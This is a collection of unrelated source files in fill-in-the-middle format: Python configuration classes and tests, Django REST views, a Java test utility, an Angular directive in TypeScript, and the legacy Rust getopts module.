self.statEval = statEvalConfig
if (statEvalConfig.appendFlag == None):
self.appendFlag = False
else:
self.appendFlag = statEvalConfig.appendFlag
class TabPar:
"""
Helper Class to configure the TableProbeBus.
Configure one of these for each dimension of your table.
Parameters:
idName: the name in the IDregistry/Context under which the
value for this axis should be searched
minimum: min value of the axis
maximum: max value of the axis
resolution: number of equidistant intervals into which the
range from min to max will be divided. Note that
the maximum value will be counted into the last interval
"""
idName = None
minimum = None
maximum = None
resolution = None
def __init__(self, idName, minimum, maximum, resolution):
self.idName = idName
self.minimum = minimum
self.maximum = maximum
self.resolution = resolution
class TableProbeBus(ProbeBus):
"""
The TableProbeBus consumes measurement values and sorts them
into n-dimensional tables of statistical evaluation objects.
Parameters:
axisParams: list of TabPar objecst, one for each dimension of the desired table
outputFilename: base name of the output files produced by the TableProbeBus
evals: list of strings with the requested statistics, possible values are:
'mean', 'variance', 'relativeVariance', 'coeffOfVariation', 'M2', 'M3', 'Z3',
'skewness', 'deviation', 'relativeDeviation', 'trials', 'min', 'max'
formats: list of strings with the requested output formats, possible values are:
'HumanReadable', 'PythonReadable', 'MatlabReadable', 'MatlabReadableSparse'
"""
nameInFactory = "TableProbeBus"
axisParams = None
outputFilename = None
evals = None
formats = None
def __init__(self, axisParams, outputFilename, evals = ['mean'], formats = ['HumanReadable']):
ProbeBus.__init__(self)
self.axisParams = axisParams
self.outputFilename = outputFilename
self.evals = list(set(evals)) # filter out potential duplicates
self.formats = list(set(formats)) # filter out potential duplicates
class TextProbeBus(ProbeBus):
"""
Wrapper for a ProbeText StatEval
"""
nameInFactory = "TextProbeBus"
key = None
outputFilename = None
evalConfig = None
writeHeader = None
prependSimTimeFlag = None
simTimePrecision = None
simTimeWidth = None
skipInterval = None
def __init__(self, outputFilename, key, description):
ProbeBus.__init__(self)
self.key = key
self.outputFilename = outputFilename
self.writeHeader = True
self.prependSimTimeFlag = True<|fim▁hole|> self.simTimePrecision = 7
self.simTimeWidth = 10
self.skipInterval = 0
self.isJSON = False
class JSONProbeBus(TextProbeBus):
def __init__(self, name, key, description):
TextProbeBus.__init__(self, name, key, description)
self.isJSON = True<|fim▁end|> | |
<|file_name|>history_delete_history.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import os, sys
sys.path.insert( 0, os.path.dirname( __file__ ) )<|fim▁hole|>try:
assert sys.argv[2]
except IndexError:
print 'usage: %s key url [purge (true/false)] ' % os.path.basename( sys.argv[0] )
sys.exit( 1 )
try:
data = {}
data[ 'purge' ] = sys.argv[3]
except IndexError:
pass
delete( sys.argv[1], sys.argv[2], data )<|fim▁end|> | from common import delete
|
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read().replace('.. :changelog:', '')
requirements = [
# TODO: put package requirements here
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='kubestack',
version='0.1.0',
description="Python app to manage dynamic Jenkins slaves with Kubernetes",
long_description=readme + '\n\n' + history,
author="Yolanda Robla",
author_email='[email protected]',
url='https://github.com/yrobla/kubestack',
packages=[
'kubestack',
],
package_dir={'kubestack':
'kubestack'},
include_package_data=True,
install_requires=requirements,
license="BSD",
zip_safe=False,
keywords='kubestack',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
test_suite='tests',<|fim▁hole|><|fim▁end|> | tests_require=test_requirements
) |
<|file_name|>filesystem_test.py<|end_file_name|><|fim▁begin|>import sys
from mock import (
patch, Mock
)
from pytest import raises
from ..test_helper import argv_kiwi_tests
import kiwi
from kiwi.exceptions import KiwiFileSystemSetupError
from kiwi.builder.filesystem import FileSystemBuilder
class TestFileSystemBuilder:
@patch('kiwi.builder.filesystem.FileSystemSetup')
@patch('platform.machine')
def setup(self, mock_machine, mock_fs_setup):
mock_machine.return_value = 'x86_64'
self.loop_provider = Mock()
self.loop_provider.get_device = Mock(
return_value='/dev/loop1'
)
self.loop_provider.create = Mock()
self.filesystem = Mock()
self.filesystem.create_on_device = Mock()
self.filesystem.create_on_file = Mock()
self.filesystem.sync_data = Mock()
self.xml_state = Mock()
self.xml_state.get_build_type_unpartitioned_bytes = Mock(
return_value=0
)
self.xml_state.get_fs_mount_option_list = Mock(
return_value=['async']
)
self.xml_state.get_fs_create_option_list = Mock(
return_value=['-O', 'option']
)
self.xml_state.get_build_type_name = Mock(
return_value='ext3'
)
self.xml_state.get_image_version = Mock(
return_value='1.2.3'
)
self.xml_state.xml_data.get_name = Mock(
return_value='myimage'
)
self.xml_state.build_type.get_target_blocksize = Mock(
return_value=4096
)
self.xml_state.build_type.get_squashfscompression = Mock(
return_value='gzip'
)
self.fs_setup = Mock()
self.fs_setup.get_size_mbytes = Mock(
return_value=42
)
self.setup = Mock()
kiwi.builder.filesystem.SystemSetup = Mock(
return_value=self.setup
)
def test_create_unknown_filesystem(self):
self.xml_state.get_build_type_name = Mock(
return_value='super-fs'
)
fs = FileSystemBuilder(
self.xml_state, 'target_dir', 'root_dir'
)
with raises(KiwiFileSystemSetupError):
fs.create()
def test_no_filesystem_configured(self):
self.xml_state.get_build_type_name = Mock(
return_value='pxe'
)
self.xml_state.build_type.get_filesystem = Mock(
return_value=None
)
with raises(KiwiFileSystemSetupError):
FileSystemBuilder(
self.xml_state, 'target_dir', 'root_dir'
)
@patch('kiwi.builder.filesystem.LoopDevice')
@patch('kiwi.builder.filesystem.FileSystem')
@patch('kiwi.builder.filesystem.FileSystemSetup')
@patch('platform.machine')
def test_create_on_loop(
self, mock_machine, mock_fs_setup, mock_fs, mock_loop
):
mock_machine.return_value = 'x86_64'
mock_fs_setup.return_value = self.fs_setup
mock_fs.return_value = self.filesystem
mock_loop.return_value = self.loop_provider
fs = FileSystemBuilder(
self.xml_state, 'target_dir', 'root_dir'
)
fs.create()
mock_loop.assert_called_once_with(
'target_dir/myimage.x86_64-1.2.3.ext3', 42, 4096
)
self.loop_provider.create.assert_called_once_with()
mock_fs.assert_called_once_with(
'ext3', self.loop_provider, 'root_dir/', {
'mount_options': ['async'],
'create_options': ['-O', 'option']
}
)
self.filesystem.create_on_device.assert_called_once_with(None)
self.filesystem.sync_data.assert_called_once_with(
['image', '.profile', '.kconfig', '.buildenv', 'var/cache/kiwi']
)
self.setup.export_package_verification.assert_called_once_with(
'target_dir'
)
self.setup.export_package_list.assert_called_once_with(
'target_dir'
)
@patch('kiwi.builder.filesystem.FileSystem')
@patch('kiwi.builder.filesystem.DeviceProvider')
@patch('platform.machine')
def test_create_on_file(
self, mock_machine, mock_provider, mock_fs
):
mock_machine.return_value = 'x86_64'
provider = Mock()
mock_provider.return_value = provider
mock_fs.return_value = self.filesystem
self.xml_state.get_build_type_name = Mock(
return_value='squashfs'
)
fs = FileSystemBuilder(
self.xml_state, 'target_dir', 'root_dir'
)
fs.create()
mock_fs.assert_called_once_with(
'squashfs', provider, 'root_dir', {
'mount_options': ['async'],
'create_options': ['-O', 'option'],
'compression': 'gzip'
}
)
self.filesystem.create_on_file.assert_called_once_with(
'target_dir/myimage.x86_64-1.2.3.squashfs', None,
['image', '.profile', '.kconfig', '.buildenv', 'var/cache/kiwi']
)<|fim▁hole|> self.setup.export_package_list.assert_called_once_with(
'target_dir'
)
def teardown(self):
sys.argv = argv_kiwi_tests<|fim▁end|> | self.setup.export_package_verification.assert_called_once_with(
'target_dir'
) |
<|file_name|>test_task.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import datetime
import nose
from nose.tools import assert_equal
from pyomni.object.task import OmniTask
class TestOmniTask(object):
def test_get_xml(self):<|fim▁hole|> nose.main(argv=['nosetests', '-s', '-v'], defaultTest=__file__)<|fim▁end|> | return
if __name__ == '__main__': |
<|file_name|>MyLinksDAOITUtil.java<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2000 - 2021 Silverpeas
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* As a special exception to the terms and conditions of version 3.0 of
* the GPL, you may redistribute this Program in connection with Free/Libre
* Open Source Software ("FLOSS") applications as described in Silverpeas's
* FLOSS exception. You should have received a copy of the text describing
* the FLOSS exception, and it is also available here:
* "https://www.silverpeas.org/legal/floss_exception.html"
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.silverpeas.core.mylinks.dao;
import org.silverpeas.core.persistence.jdbc.sql.JdbcSqlQuery;
import java.sql.SQLException;
import java.util.List;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.contains;
import static org.hamcrest.Matchers.empty;
/**
* @author silveryocha
*/
public class MyLinksDAOITUtil {
private MyLinksDAOITUtil() {
}
static void assertLinkIds(final List<Integer> actualIds, final Integer... expectedIds) {
if (expectedIds.length == 0) {
assertThat(actualIds, empty());
} else {
assertThat(actualIds, contains(expectedIds));
}
}
static List<Integer> getAllLinkIds() throws SQLException {
return JdbcSqlQuery.createSelect("linkid")
.from("SB_MyLinks_Link")
.orderBy("linkid")
.execute(r -> r.getInt(1));
}
<|fim▁hole|> assertThat(actualIds, contains(expectedIds));
}
}
static List<Integer> getAllCategoryIds() throws SQLException {
return JdbcSqlQuery.createSelect("catid")
.from("SB_MyLinks_Cat")
.orderBy("catid")
.execute(r -> r.getInt(1));
}
static void assertOfCouples(final List<String> actualCouples, final String... expectedCouples) {
if (expectedCouples.length == 0) {
assertThat(actualCouples, empty());
} else {
assertThat(actualCouples, contains(expectedCouples));
}
}
static List<String> getAllOfCouples() throws SQLException {
return JdbcSqlQuery.createSelect("*")
.from("SB_MyLinks_LinkCat")
.orderBy("catid, linkid")
.execute(r -> r.getInt("catid") + "/" + r.getInt("linkid"));
}
}<|fim▁end|> | static void assertCategoryIds(final List<Integer> actualIds, final Integer... expectedIds) {
if (expectedIds.length == 0) {
assertThat(actualIds, empty());
} else { |
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from rest_framework import generics, permissions, views, response,status
from .models import Account
from .serializers import AccountCreateSerializer, AccountSerializer, AuthenticateSerializer, \<|fim▁hole|> UpdateAccountSerializer, AccountRetrieveSerializer
# Create your views here.
class AccountCreateView(generics.CreateAPIView):
queryset = Account.objects.all()
serializer_class = AccountCreateSerializer
permission_classes = [permissions.AllowAny]
class AccountListView(generics.ListAPIView):
queryset = Account.objects.all()
serializer_class = AccountSerializer
permission_classes = [permissions.IsAuthenticated]
class AccountRetrieveView(generics.RetrieveAPIView):
queryset = Account.objects.all()
serializer_class = AccountRetrieveSerializer
class UpdateAccountView(generics.UpdateAPIView):
queryset = Account.objects.all()
serializer_class = UpdateAccountSerializer
# permission_classes = [permissions.IsAuthenticated]
class AccountAuthenticationView(views.APIView):
queryset = Account.objects.all()
serializer_class = AuthenticateSerializer
def post(self, request):
data = request.data
serializer = AuthenticateSerializer(data=data)
if serializer.is_valid(raise_exception=True):
new_date = serializer.data
return response.Response(new_date,status=status.HTTP_200_OK)
return response.Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)<|fim▁end|> | |
<|file_name|>test_dynamicfields.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
import unittest
import mock<|fim▁hole|>
class DynamicFieldsMixinTestCase(unittest.TestCase):
"""Test functionality of the DynamicFieldsMixin class."""
def test_restrict_dynamic_fields(self):<|fim▁end|> | |
<|file_name|>leftMenuAutosize.ts<|end_file_name|><|fim▁begin|>/// <reference path="../../config/config.ts" />
/// <reference path="../interfaces/directives/IDirective.ts" />
declare var angular:any;
//Directive responsible for manipulating left (top) menu icons area when available size change
module Directives {
'use strict';
export class LeftMenuAutosize implements Directives.IDirective {
private static Timeout:any;
private static Window:any;
private Scope:any;
private Element:any;
private Promise:any;
private WindowDimensions:any;
private MenuDimensions:any;
//@ngInject
public static DirectiveOptions($timeout:any, $window:any):any {
LeftMenuAutosize.Timeout = $timeout;
LeftMenuAutosize.Window = $window;
return {
restrict: 'A',
scope: {
expandIconSize: '=',
iconSize: '=',
iconCount: '='
},
replace: false,
link: function ($scope:any, $linkElement:any, $linkAttributes:any):void {
var instance:Directives.IDirective = new LeftMenuAutosize();
instance.Link($scope, $linkElement, $linkAttributes);
}
};
}
public Link($scope:any, $linkElement:any, $linkAttributes:any):void {
this.Scope = $scope;
this.Element = $linkElement;
this.SizeChanged();
$scope.$watch('iconCount', this.SizeChanged.bind(this));
angular.element(LeftMenuAutosize.Window).on('resize', this.SizeChanged.bind(this));
this.BindExpandButton();
}
private SizeChanged():void {<|fim▁hole|> LeftMenuAutosize.Timeout.cancel(this.Promise);
this.Promise = LeftMenuAutosize.Timeout(this.SetIconsVisibility.bind(this), 0, false);
}
private MeasureDimensions():void {
this.WindowDimensions = {
width: LeftMenuAutosize.Window.innerWidth,
height: LeftMenuAutosize.Window.innerHeight
};
this.MenuDimensions = {
width: this.Element[0].offsetWidth,
height: this.Element[0].offsetHeight
};
this.MenuDimensions.primaryDimensionSize = Math.max(this.MenuDimensions.width, this.MenuDimensions.height);
this.MenuDimensions.primaryDimension = this.MenuDimensions.height > this.MenuDimensions.width ? 'height' : 'width';
this.MenuDimensions.secondaryDimension = this.MenuDimensions.primaryDimension === 'height' ? 'width' : 'height';
}
private SetIconsVisibility():void {
//Collapse menu
if (this.Element.hasClass('expanded')) {
this.ExpandCollapseMenu(null, true);
}
//Assume that everything can fit
this.Element.removeClass('collapsed');
var elementChildren:any[] = this.Element.children();
angular.forEach(elementChildren, function (item:any, key:number):void {
angular.element(item).removeClass('collapsed');
});
//Measure space
this.MeasureDimensions();
var availableSpace:number = this.MenuDimensions.primaryDimensionSize;
var everythingCanFit:boolean = (this.Scope.iconCount || 0) * this.Scope.iconSize <= availableSpace;
if (!everythingCanFit) {
//Enable collapse-expand of panel
this.Element.addClass('collapsed');
//Hide records that cannot fit
var canFitNumber:number = Math.floor((availableSpace - this.Scope.expandIconSize) / this.Scope.iconSize);
angular.forEach(elementChildren, function (item:any, key:number):void {
if (item.className !== 'menuEntityExpand' && key >= canFitNumber) {
angular.element(item).addClass('collapsed');
}
});
}
}
private BindExpandButton():void {
var toggle:any = this.Element[0].querySelector('.menuEntityExpand');
toggle.onclick = this.ExpandCollapseMenu.bind(this);
toggle.onblur = this.ExpandCollapseMenu.bind(this);
}
private ExpandCollapseMenu(event:any, collapse:boolean):void {
var _this:LeftMenuAutosize = this;
var isExpanded:boolean = this.Element.hasClass('expanded');
var shouldCollapse:boolean = collapse !== null ? collapse : isExpanded;
if (event.type === 'blur') {
shouldCollapse = true;
}
//Toggle
if (shouldCollapse) {
//Collapse
setTimeout(function ():void {
_this.Element.addClass('collapsed');
_this.Element.removeClass('expanded');
_this.Element.css(_this.MenuDimensions.primaryDimension, '');
_this.Element.css(_this.MenuDimensions.secondaryDimension, '');
_this.Element.css('max-' + _this.MenuDimensions.secondaryDimension, '');
}, 200);
} else {
//Calculate required size
var totalCount:number = this.Scope.iconCount + 1;
var primaryDimensionFitCount:number = Math.floor((this.MenuDimensions.primaryDimensionSize - this.Scope.expandIconSize) / this.Scope.iconSize);
var requiredSecondaryDimensionFitCount:number = Math.ceil(totalCount / primaryDimensionFitCount);
var requiredSecondaryDimensionSize:number = Math.min(requiredSecondaryDimensionFitCount * this.Scope.iconSize,
this.WindowDimensions[this.MenuDimensions.secondaryDimension] - this.Scope.iconSize);
var secondaryDimensionRealFitCount:number = Math.floor(requiredSecondaryDimensionSize / this.Scope.iconSize);
var primaryDimensionReconciledFitCount:number = Math.ceil(totalCount / secondaryDimensionRealFitCount);
var primaryDimensionReconciledSize:number = Math.min(primaryDimensionReconciledFitCount * this.Scope.iconSize,
this.WindowDimensions[this.MenuDimensions.primaryDimension] - this.Scope.iconSize);
//Expand
this.Element.removeClass('collapsed');
this.Element.addClass('expanded');
this.Element.css(this.MenuDimensions.primaryDimension, primaryDimensionReconciledSize + 'px');
this.Element.css(this.MenuDimensions.secondaryDimension, requiredSecondaryDimensionSize + 'px');
this.Element.css('max-' + this.MenuDimensions.secondaryDimension, requiredSecondaryDimensionSize + 'px');
}
}
}
}<|fim▁end|> | |
<|file_name|>Pascal's Triangle.py<|end_file_name|><|fim▁begin|>class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
pascal = []
if numRows >= 1:
pascal.append([1])
for i in range(1, numRows):
pascal.append([pascal[-1][0]])
for j in range(1, len(pascal[-2])):
pascal[-1].append(pascal[-2][j - 1] + pascal[-2][j])<|fim▁hole|> return pascal<|fim▁end|> | pascal[-1].append(pascal[-2][-1]) |
<|file_name|>getopts.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Simple getopt alternative.
//!
//! Construct a vector of options, either by using `reqopt`, `optopt`, and `optflag`
//! or by building them from components yourself, and pass them to `getopts`,
//! along with a vector of actual arguments (not including `argv[0]`). You'll
//! either get a failure code back, or a match. You'll have to verify whether
//! the amount of 'free' arguments in the match is what you expect. Use `opt_*`
//! accessors to get argument values out of the matches object.
//!
//! Single-character options are expected to appear on the command line with a
//! single preceding dash; multiple-character options are expected to be
//! proceeded by two dashes. Options that expect an argument accept their
//! argument following either a space or an equals sign. Single-character
//! options don't require the space.
//!
//! # Example
//!
//! The following example shows simple command line parsing for an application
//! that requires an input file to be specified, accepts an optional output
//! file name following `-o`, and accepts both `-h` and `--help` as optional flags.
//!
//! ~~~{.rust}
//! exter mod extra;
//! use extra::getopts::*;
//! use std::os;
//!
//! fn do_work(inp: &str, out: Option<~str>) {
//! println(inp);
//! println(match out {
//! Some(x) => x,
//! None => ~"No Output"
//! });
//! }
//!
//! fn print_usage(program: &str, _opts: &[Opt]) {
//! println!("Usage: {} [options]", program);
//! println("-o\t\tOutput");
//! println("-h --help\tUsage");
//! }
//!
//! fn main() {
//! let args = os::args();
//!
//! let program = args[0].clone();
//!
//! let opts = ~[
//! optopt("o"),
//! optflag("h"),
//! optflag("help")
//! ];
//! let matches = match getopts(args.tail(), opts) {
//! Ok(m) => { m }
//! Err(f) => { fail2!(f.to_err_msg()) }
//! };
//! if matches.opt_present("h") || matches.opt_present("help") {
//! print_usage(program, opts);
//! return;
//! }
//! let output = matches.opt_str("o");
//! let input: &str = if !matches.free.is_empty() {
//! matches.free[0].clone()
//! } else {
//! print_usage(program, opts);
//! return;
//! };
//! do_work(input, output);
//! }
//! ~~~
use std::cmp::Eq;
use std::result::{Err, Ok};
use std::result;
use std::option::{Some, None};
use std::vec;
/// Name of an option. Either a string or a single char.
#[deriving(Clone, Eq)]
#[allow(missing_doc)]
pub enum Name {
Long(~str),
Short(char),
}
/// Describes whether an option has an argument.
#[deriving(Clone, Eq)]
#[allow(missing_doc)]
pub enum HasArg {
Yes,
No,
Maybe,
}
/// Describes how often an option may occur.
#[deriving(Clone, Eq)]
#[allow(missing_doc)]
pub enum Occur {
Req,
Optional,
Multi,
}
/// A description of a possible option.
#[deriving(Clone, Eq)]
pub struct Opt {
/// Name of the option
name: Name,
/// Wheter it has an argument
hasarg: HasArg,
/// How often it can occur
occur: Occur,
/// Which options it aliases
aliases: ~[Opt],
}
/// Describes wether an option is given at all or has a value.
#[deriving(Clone, Eq)]
enum Optval {
Val(~str),
Given,
}
/// The result of checking command line arguments. Contains a vector
/// of matches and a vector of free strings.
#[deriving(Clone, Eq)]
pub struct Matches {
/// Options that matched
opts: ~[Opt],
/// Values of the Options that matched
vals: ~[~[Optval]],
/// Free string fragments
free: ~[~str]
}
/// The type returned when the command line does not conform to the
/// expected format. Pass this value to <fail_str> to get an error message.
#[deriving(Clone, Eq, ToStr)]
#[allow(missing_doc)]
pub enum Fail_ {
ArgumentMissing(~str),
UnrecognizedOption(~str),
OptionMissing(~str),
OptionDuplicated(~str),
UnexpectedArgument(~str),
}
/// The type of failure that occured.
#[deriving(Eq)]
#[allow(missing_doc)]
pub enum FailType {
ArgumentMissing_,
UnrecognizedOption_,
OptionMissing_,
OptionDuplicated_,
UnexpectedArgument_,
}
/// The result of parsing a command line with a set of options.
pub type Result = result::Result<Matches, Fail_>;
impl Name {
fn from_str(nm: &str) -> Name {
if nm.len() == 1u {
Short(nm.char_at(0u))
} else {
Long(nm.to_owned())
}
}
fn to_str(&self) -> ~str {
match *self {
Short(ch) => ch.to_str(),
Long(ref s) => s.to_owned()
}
}
}
impl Matches {
/// FIXME: #9311 This used to be private, but rustpkg somehow managed to depend on it.
/// No idea what this does.
pub fn opt_vals(&self, nm: &str) -> ~[Optval] {
match find_opt(self.opts, Name::from_str(nm)) {
Some(id) => self.vals[id].clone(),
None => fail2!("No option '{}' defined", nm)
}
}
/// FIXME: #9311 This used to be private, but rustpkg somehow managed to depend on it.
/// No idea what this does.
pub fn opt_val(&self, nm: &str) -> Option<Optval> {
let vals = self.opt_vals(nm);
if (vals.is_empty()) {
None
} else {
Some(vals[0].clone())
}
}
/// Returns true if an option was matched.
pub fn opt_present(&self, nm: &str) -> bool {
!self.opt_vals(nm).is_empty()
}
/// Returns the number of times an option was matched.
pub fn opt_count(&self, nm: &str) -> uint {
self.opt_vals(nm).len()
}
/// Returns true if any of several options were matched.
pub fn opts_present(&self, names: &[~str]) -> bool {
for nm in names.iter() {
match find_opt(self.opts, Name::from_str(*nm)) {
Some(id) if !self.vals[id].is_empty() => return true,
_ => (),
};
}
false
}
/// Returns the string argument supplied to one of several matching options or `None`.
pub fn opts_str(&self, names: &[~str]) -> Option<~str> {
for nm in names.iter() {
match self.opt_val(*nm) {
Some(Val(ref s)) => return Some(s.clone()),
_ => ()
}
}
None
}
/// Returns a vector of the arguments provided to all matches of the given
/// option.
///
/// Used when an option accepts multiple values.
pub fn opt_strs(&self, nm: &str) -> ~[~str] {
let mut acc: ~[~str] = ~[];
let r = self.opt_vals(nm);
for v in r.iter() {
match *v {
Val(ref s) => acc.push((*s).clone()),
_ => ()
}
}
acc
}
/// Returns the string argument supplied to a matching option or `None`.
pub fn opt_str(&self, nm: &str) -> Option<~str> {
let vals = self.opt_vals(nm);
if vals.is_empty() {
return None::<~str>;
}
match vals[0] {
Val(ref s) => Some((*s).clone()),
_ => None
}
}
/// Returns the matching string, a default, or none.
///
/// Returns none if the option was not present, `def` if the option was
/// present but no argument was provided, and the argument if the option was
/// present and an argument was provided.
pub fn opt_default(&self, nm: &str, def: &str) -> Option<~str> {
let vals = self.opt_vals(nm);
if vals.is_empty() { return None; }
match vals[0] {
Val(ref s) => Some((*s).clone()),
_ => Some(def.to_owned())
}
}
}
fn is_arg(arg: &str) -> bool {
arg.len() > 1 && arg[0] == '-' as u8
}
fn find_opt(opts: &[Opt], nm: Name) -> Option<uint> {
// Search main options.
let pos = opts.iter().position(|opt| opt.name == nm);
if pos.is_some() {
return pos
}
// Search in aliases.
for candidate in opts.iter() {
if candidate.aliases.iter().position(|opt| opt.name == nm).is_some() {
return opts.iter().position(|opt| opt.name == candidate.name);
}
}
None
}
/// Create an option that is required and takes an argument.
pub fn reqopt(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: Yes,
occur: Req,
aliases: ~[]
}
}
/// Create an option that is optional and takes an argument.
pub fn optopt(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: Yes,
occur: Optional,
aliases: ~[]
}
}
/// Create an option that is optional and does not take an argument.
pub fn optflag(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: No,
occur: Optional,
aliases: ~[]
}
}
/// Create an option that is optional, does not take an argument,
/// and may occur multiple times.
pub fn optflagmulti(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: No,
occur: Multi,
aliases: ~[]
}
}
/// Create an option that is optional and takes an optional argument.
pub fn optflagopt(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: Maybe,
occur: Optional,
aliases: ~[]
}
}
/// Create an option that is optional, takes an argument, and may occur
/// multiple times.
pub fn optmulti(name: &str) -> Opt {
Opt {
name: Name::from_str(name),
hasarg: Yes,
occur: Multi,
aliases: ~[]
}
}
impl Fail_ {
/// Convert a `Fail_` enum into an error string.
pub fn to_err_msg(self) -> ~str {
match self {
ArgumentMissing(ref nm) => {
format!("Argument to option '{}' missing.", *nm)
}
UnrecognizedOption(ref nm) => {
format!("Unrecognized option: '{}'.", *nm)
}
OptionMissing(ref nm) => {
format!("Required option '{}' missing.", *nm)
}
OptionDuplicated(ref nm) => {
format!("Option '{}' given more than once.", *nm)
}
UnexpectedArgument(ref nm) => {
format!("Option '{}' does not take an argument.", *nm)
}
}
}
}
/// Parse command line arguments according to the provided options.
///
/// On success returns `Ok(Opt)`. Use methods such as `opt_present`
/// `opt_str`, etc. to interrogate results. Returns `Err(Fail_)` on failure.
/// Use `to_err_msg` to get an error message.
pub fn getopts(args: &[~str], opts: &[Opt]) -> Result {
let n_opts = opts.len();
fn f(_x: uint) -> ~[Optval] { return ~[]; }
let mut vals = vec::from_fn(n_opts, f);
let mut free: ~[~str] = ~[];
let l = args.len();
let mut i = 0;
while i < l {
let cur = args[i].clone();
let curlen = cur.len();
if !is_arg(cur) {
free.push(cur);
} else if cur == ~"--" {
let mut j = i + 1;
while j < l { free.push(args[j].clone()); j += 1; }
break;
} else {
let mut names;
let mut i_arg = None;
if cur[1] == '-' as u8 {
let tail = cur.slice(2, curlen);
let tail_eq: ~[&str] = tail.split_iter('=').collect();
if tail_eq.len() <= 1 {
names = ~[Long(tail.to_owned())];
} else {
names =
~[Long(tail_eq[0].to_owned())];
i_arg = Some(tail_eq[1].to_owned());
}
} else {
let mut j = 1;
let mut last_valid_opt_id = None;
names = ~[];
while j < curlen {
let range = cur.char_range_at(j);
let opt = Short(range.ch);
/* In a series of potential options (eg. -aheJ), if we
see one which takes an argument, we assume all
subsequent characters make up the argument. This
allows options such as -L/usr/local/lib/foo to be
interpreted correctly
*/
match find_opt(opts, opt.clone()) {
Some(id) => last_valid_opt_id = Some(id),
None => {
let arg_follows =
last_valid_opt_id.is_some() &&
match opts[last_valid_opt_id.unwrap()]
.hasarg {
Yes | Maybe => true,
No => false
};
if arg_follows && j < curlen {
i_arg = Some(cur.slice(j, curlen).to_owned());
break;
} else {
last_valid_opt_id = None;
}
}
}
names.push(opt);
j = range.next;
}
}
let mut name_pos = 0;
for nm in names.iter() {
name_pos += 1;
let optid = match find_opt(opts, (*nm).clone()) {
Some(id) => id,
None => return Err(UnrecognizedOption(nm.to_str()))
};
match opts[optid].hasarg {
No => {
if !i_arg.is_none() {
return Err(UnexpectedArgument(nm.to_str()));
}
vals[optid].push(Given);
}
Maybe => {
if !i_arg.is_none() {
vals[optid].push(Val((i_arg.clone()).unwrap()));
} else if name_pos < names.len() ||
i + 1 == l || is_arg(args[i + 1]) {
vals[optid].push(Given);
} else { i += 1; vals[optid].push(Val(args[i].clone())); }
}
Yes => {
if !i_arg.is_none() {
vals[optid].push(Val(i_arg.clone().unwrap()));
} else if i + 1 == l {
return Err(ArgumentMissing(nm.to_str()));
} else { i += 1; vals[optid].push(Val(args[i].clone())); }
}
}
}
}
i += 1;
}
i = 0u;
while i < n_opts {
let n = vals[i].len();
let occ = opts[i].occur;
if occ == Req {
if n == 0 {
return Err(OptionMissing(opts[i].name.to_str()));
}
}
if occ != Multi {
if n > 1 {
return Err(OptionDuplicated(opts[i].name.to_str()));
}
}
i += 1;
}
Ok(Matches {
opts: opts.to_owned(),
vals: vals,
free: free
})
}
/// A module which provides a way to specify descriptions and
/// groups of short and long option names, together.
pub mod groups {
use getopts::{HasArg, Long, Maybe, Multi, No, Occur, Opt, Optional, Req};
use getopts::{Short, Yes};
/// One group of options, e.g., both -h and --help, along with
/// their shared description and properties.
#[deriving(Clone, Eq)]
pub struct OptGroup {
/// Short Name of the `OptGroup`
short_name: ~str,
/// Long Name of the `OptGroup`
long_name: ~str,
/// Hint
hint: ~str,
/// Description
desc: ~str,
/// Whether it has an argument
hasarg: HasArg,
/// How often it can occur
occur: Occur
}
impl OptGroup {
/// Translate OptGroup into Opt.
/// (Both short and long names correspond to different Opts).
pub fn long_to_short(&self) -> Opt {
let OptGroup {
short_name: short_name,
long_name: long_name,
hasarg: hasarg,
occur: occur,
_
} = (*self).clone();
match (short_name.len(), long_name.len()) {
(0,0) => fail2!("this long-format option was given no name"),
(0,_) => Opt {
name: Long((long_name)),
hasarg: hasarg,
occur: occur,
aliases: ~[]
},
(1,0) => Opt {
name: Short(short_name.char_at(0)),
hasarg: hasarg,
occur: occur,
aliases: ~[]
},
(1,_) => Opt {
name: Long((long_name)),
hasarg: hasarg,
occur: occur,
aliases: ~[
Opt {
name: Short(short_name.char_at(0)),
hasarg: hasarg,
occur: occur,
aliases: ~[]
}
]
},
(_,_) => fail2!("something is wrong with the long-form opt")
}
}
}
/// Create a long option that is required and takes an argument.
